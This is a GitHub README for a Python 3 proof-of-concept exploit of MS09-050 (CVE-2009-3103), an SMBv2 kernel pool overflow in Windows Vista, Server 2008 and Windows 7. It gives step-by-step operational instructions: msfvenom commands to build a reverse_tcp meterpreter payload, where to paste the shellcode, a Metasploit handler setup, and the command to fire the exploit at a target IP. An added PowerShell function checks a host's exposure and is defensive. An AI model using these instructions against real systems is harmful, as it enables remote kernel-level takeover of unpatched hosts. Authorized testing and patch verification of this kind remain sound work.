jcs3c/SMBv2-Exploit-PrivEsc


# MS09-050 Python 3 Exploit PoC

This repository contains a modernized, Python 3 compatible proof-of-concept exploit for the MS09-050 (CVE-2009-3103) vulnerability. The original script was ported from Python 2 and has been refactored for clarity, reliability, and educational purposes.

## Disclaimer

This tool is for educational and authorized security testing purposes ONLY. Do not use it on any system or network without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this script. Unauthorized hacking is illegal. Use at your own risk.

## Vulnerability Information

- CVE ID: CVE-2009-3103
- Vulnerability: SMBv2 Negotiate Protocol Request Kernel Pool Overflow
- Description: A memory corruption vulnerability exists in the SMBv2 protocol implementation in Microsoft Windows. A specially crafted Negotiate Protocol Request can cause a kernel pool overflow, allowing a remote attacker to execute arbitrary code with kernel-level privileges.
- Affected Systems:
  - Windows Vista (SP1, SP2)
  - Windows Server 2008 (SP1, SP2)
  - Windows 7 (Unpatched, pre-SP1)
  - Windows Server 2008 R2 (Unpatched, pre-SP1)

This exploit will NOT work on modern systems like Windows 10/11 or older systems like Windows XP.
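As an added defender-side example (not code from this repository), the following PowerShell function reports whether a Windows host falls into the affected population listed above, which is also the check the Troubleshooting section asks for before blaming the exploit. It tests the OS family and service pack against the affected list, looks for the MS09-050 update (assumed here to be KB975517, the bulletin's update number; confirm against your own patch catalogue), and reads the `SMB2` value under `LanmanServer\Parameters`, which is the documented server-side workaround for disabling SMBv2. It also counts recent BugCheck events in the System log, because a failed kernel pool overflow usually leaves a crash behind. The function name and output property names are this example's own.

```powershell
# Added defender-side check, not part of the jcs3c/SMBv2-Exploit-PrivEsc repository.
# Assumptions: KB975517 is the MS09-050 update number; SMB2=0 under LanmanServer\Parameters
# is the Microsoft workaround that disables SMBv2 on the server side.
function Test-Ms09050Exposure {
    param(
        [string]$ComputerName = $env:COMPUTERNAME
    )

    # OS version families from the README's affected list:
    #   6.0 = Vista / Server 2008 (affected on SP1 and SP2)
    #   6.1 = Windows 7 / Server 2008 R2 (affected only before SP1)
    $os  = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $ComputerName
    $ver = [version]$os.Version
    $sp  = [int]$os.ServicePackMajorVersion
    $affectedFamily = ($ver.Major -eq 6) -and (
        ($ver.Minor -eq 0) -or
        ($ver.Minor -eq 1 -and $sp -eq 0)
    )

    # Patch check: the MS09-050 update (assumed KB975517) installed on the host.
    $patched = $null -ne (Get-HotFix -Id KB975517 -ComputerName $ComputerName -ErrorAction SilentlyContinue)

    # Workaround check: SMB2 = 0 disables SMBv2 serving, so the vulnerable code path is not reachable.
    $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
    $key = $reg.OpenSubKey('SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters')
    $smb2Value = if ($key) { $key.GetValue('SMB2', $null) } else { $null }
    $smb2Disabled = ($smb2Value -eq 0)

    # Crash evidence: Event ID 1001 in the System log whose message mentions a bugcheck.
    # A burst of these on an SMB server is worth correlating with inbound TCP/445 traffic.
    $bugchecks = @(
        Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'System'; Id = 1001 } `
            -MaxEvents 50 -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'bugcheck' }
    )

    # New-Object PSObject keeps this runnable on the PowerShell 2.0 hosts in the affected list.
    New-Object PSObject -Property @{
        ComputerName    = $ComputerName
        OSVersion       = $os.Version
        ServicePack     = $sp
        AffectedFamily  = $affectedFamily
        KB975517Present = $patched
        SMB2Disabled    = $smb2Disabled
        RecentBugchecks = $bugchecks.Count
        Exposed         = $affectedFamily -and (-not $patched) -and (-not $smb2Disabled)
    }
}

# Run against the local host; pass -ComputerName to query a remote server you administer.
Test-Ms09050Exposure | Format-List
```

`Exposed` is only true when the host is in an affected OS/SP combination, the update is absent, and the SMBv2 workaround is not applied; a host on Windows 10/11 or XP reports `AffectedFamily` false regardless of patch state, matching the note above.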

โš™๏ธ Requirements Python 3: The script is written in Python 3. rpcclient: This tool is part of the Samba suite and is required to trigger the payload.

## How to Use

Follow these steps carefully to set up and run the exploit.

### Step 1: Generate Your Shellcode

You must generate your own shellcode with your LHOST (your attacking machine's IP) and LPORT. Use msfvenom for this.

Option A: Meterpreter Payload (Recommended)

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=4444 -f python -o shellcode.py
```

(If you suspect the target is 32-bit, use windows/meterpreter/reverse_tcp)

### Step 2: Paste Your Shellcode into exploit.py

```python
# ... inside exploit.py

# --- Paste your custom shellcode here ---
shell = b""
# The 'buf +=' lines from your shellcode.py file go here
shell += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
shell += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
# ... and so on ...

# ... rest of the script
```

### Step 3: Set Up Your Listener

Open a new terminal and start your Metasploit Framework listener. Your listener's payload MUST match the one you generated with msfvenom.

For a Meterpreter Payload:

```bash
msfconsole -q
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST YOUR_IP_ADDRESS
msf6 > set LPORT 4444
msf6 > run
```

For a Command Shell Payload:

### Step 4: Run the Exploit

```bash
python3 exploit.py <TARGET_IP_ADDRESS>
```

If successful, you will see a session open in your Metasploit console.

## Troubleshooting

No Connection at All:

- Target Not Vulnerable: Double-check that the target OS is affected and unpatched. Use the auxiliary/scanner/smb/smb_ms09_050 module in Metasploit to verify.
- Network/Firewall Issue: Ensure there is no firewall blocking the reverse connection from the target to your LPORT (e.g., 4444).
- Exploit Instability: Kernel pool exploits can be unstable. Reboot the target machine to reset its memory state and try again. This often solves the problem.

## Credits

This script is a modernized version of the original EDB proof-of-concept by ohnozzy. Full credit goes to the original author for the exploit logic.

## License

This project is licensed under the MIT License. See the LICENSE file for details.

About

MS09_050 Exploit with Python3 updated. Don't forget to change your own payload.
